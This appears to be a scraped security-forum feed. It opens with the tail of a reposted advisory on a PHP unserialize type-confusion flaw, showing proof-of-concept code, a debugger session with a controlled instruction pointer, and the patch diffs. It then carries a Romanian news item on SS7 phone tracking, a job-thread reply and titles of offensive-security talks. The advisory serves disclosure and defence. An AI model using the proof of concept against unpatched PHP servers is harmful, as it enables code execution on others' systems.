($i=0; $i<8; $i++) { $out .= chr($ptr & 0xff); $ptr >>= 8; } return $out; } ?>[/phpcode] You can then test the POC on the command line: $ lldb php Current executable set to 'php' (x86_64). (lldb) run exploit.php 0x1122334455 There is a running process, kill it and restart?: [Y/n] y Process 38336 exited with status = 9 (0x00000009) Process 38348 launched: '/usr/bin/php' (x86_64) Setting up memory... Now performing exploit... Process 38348 stopped * thread #1: tid = 0x636867, 0x0000001122334455, queue = 'com.apple.main-thread', stop reason = EXC_BAD_ACCESS (code=1, address=0x1122334455) frame #0: 0x0000001122334455 error: memory read failed for 0x1122334400 (lldb) re re General Purpose Registers: rax = 0x0000001122334455 rbx = 0x0000000114000020 rcx = 0x000000010030fd48 php`_zval_dtor_func + 160 rdx = 0x0000000100d22050 rdi = 0x0000000114000038 rsi = 0x0000000000000000 rbp = 0x00007fff5fbfe8b0 rsp = 0x00007fff5fbfe888 r8 = 0x0000000000000000 r9 = 0x0000000000000008 r10 = 0x0000000000000000 r11 = 0x000000000000005b r12 = 0x0000000100956be8 php`executor_globals r13 = 0x0000000000000000 r14 = 0x0000000114000220 r15 = 0x0000000000000000 rip = 0x0000001122334455 <----- controlled RIP rflags = 0x0000000000010206 cs = 0x000000000000002b fs = 0x0000000000000000 gs = 0x0000000022330000 (lldb) x/20x $rdi-0x18 0x114000020: 0x00000001 0x00000000 0x00000000 0x00000000 0x114000030: 0x14000038 0x00000001 0x14000120 0x00000001 <---- &pDataPtr 0x114000040: 0x00000000 0x00000000 0x00000000 0x00000000 0x114000050: 0x00000000 0x00000000 0x00000000 0x00000000 0x114000060: 0x00000000 0x00000000 0x73737373 0x73737373 The Fix We shared our patches for these vulnerabilities with the PHP developers who have therefore released PHP 5.5.14, PHP 5.4.30 and PHP 5.3.29. If you are running any of these versions you do not need to apply the fix. If you are not you should make sure that you apply the following patchset. --- php-5.5.13/ext/spl/spl_observer.c 2014-05-28 11:06:28.000000000 +0200 +++ php-5.5.13-unserialize-fixed/ext/spl/spl_observer.c 2014-06-20 17:54:33.000000000 +0200 @@ -898,7 +898,7 @@ ++p; ALLOC_INIT_ZVAL(pmembers); - if (!php_var_unserialize(&pmembers, &p, s + buf_len, &var_hash TSRMLS_CC)) { + if (!php_var_unserialize(&pmembers, &p, s + buf_len, &var_hash TSRMLS_CC) || Z_TYPE_P(pmembers) != IS_ARRAY) { zval_ptr_dtor(&pmembers); goto outexcept; } --- php-5.5.13/ext/spl/spl_array.c 2014-05-28 11:06:28.000000000 +0200 +++ php-5.5.13-unserialize-fixed/ext/spl/spl_array.c 2014-06-20 17:54:09.000000000 +0200 @@ -1789,7 +1789,7 @@ ++p; ALLOC_INIT_ZVAL(pmembers); - if (!php_var_unserialize(&pmembers, &p, s + buf_len, &var_hash TSRMLS_CC)) { + if (!php_var_unserialize(&pmembers, &p, s + buf_len, &var_hash TSRMLS_CC) || Z_TYPE_P(pmembers) != IS_ARRAY) { zval_ptr_dtor(&pmembers); goto outexcept; } Stefan Esser Sursa: https://www.sektioneins.de/en/blog/14-08-27-unserialize-typeconfusion.html
-
Echipamente de monitorizare pentru urm?rirea telefoanelor mobile, disponibile oricui pentru închiriere sau cump?rare Aurelian Mihai - 26 aug 2014 Considerat de mult timp un privilegiu rezervat ??rilor bogate, spionarea în mas? a utilizatorilor de telefonie mobil? este, aparent, la îndemâna oric?rui guvern sau organiza?ie dispus? s? cumpere sau închirieze echipamentele necesare, respectiv s? ob?in? cooperarea operatorilor de telefonie. Potrivit dezv?luirilor f?cute de publica?ia Washington Post, zeci de ??ri ar fi cump?rat deja sau închiriat echipamente de supraveghere care permit monitorizarea telefoanelor mobile oriunde în lume, singura condi?ie fiind ca operatorul local de telefonie s? coopereze tolerând astfel de activit??i. Toate acestea sunt posibile cu ajutorul unui software specializat care exploateaz? vulnerabilit??ile setului de protocoale SS7, implementat în anul 1993 ?i folosit f?r? alte modific?ri pentru semnalizare în majoritatea re?elelor de telefonie din lume. Aparent, pentru stabilirea loca?iei unui utilizator nu este necesar? decât interogarea re?elelor de telefonie furnizând num?rul de telefon. Cu suficient de multe interog?ri repetate la diferite intervale de timp este posibil? localizarea persoanei vizate aproape oriunde în lume, precum ?i urm?rirea deplas?rilor pas cu pas. Echipamente de monitorizare pentru urm?rirea telefoanelor mobile, disponibile oricui pentru închiriere sau cump?rare Mai departe, sistemul poate fi folosit în combina?ie cu alte mijloace de supraveghere pentru interceptarea traficului de date trimis c?tre ?i dinspre telefonul mobil, respectiv stabilirea loca?iei exacte. Cunoscute sub denumirea de StingRays, echipamente de interceptare adresate ini?ial autorit??ilor americane pentru folosirea în misiuni de supraveghere ar fi ajuns pe mâini gre?ite, fiind în prezent folosite pentru a servi intereselor unor ter?e persoane ?i organiza?ii. Din p?cate prevenirea abuzurilor este dificil de pus în practic? atât timp cât peste 75% dintre re?ele accept? cereri de localizare trimise folosind protocolul SS7 ?i nu ofer? mijloace pentru blocarea eficient? a solicit?rilor abuzive. O alternativ? mai sigur? pentru sistemul SS7 va fi gata abia în urm?torii 10 ani, între timp singura metod? de ap?rare fiind nedivulgarea num?rului de telefon ?i schimbarea periodic? a acestuia, preferabil împreun? cu telefoanele folosite pân? atunci. Sursa: Echipamente de monitorizare pentru urm?rirea telefoanelor mobile, disponibile oricui pentru închiriere sau cump?rare
-
Oferta Angajare Linux SYSADMIN Firma Hosting Italia
Nytro replied to sdfantini's topic in Locuri de munca
@Cheater ? -
[h=1]OFFENSIVE: Exploiting DNS Servers Changes by Leonardo Nve[/h]
-
[h=1]Building Trojan Hardware at Home by JP Dunning[/h]
-
[h=1]PDF Attack: A Journey From the Exploit Kit to the Shellcode Part 1 by Jose Miguel Esparza[/h] [h=1]PDF Attack: A Journey From the Exploit Kit to the Shellcode Part 2 by Jose Miguel Esparza[/h]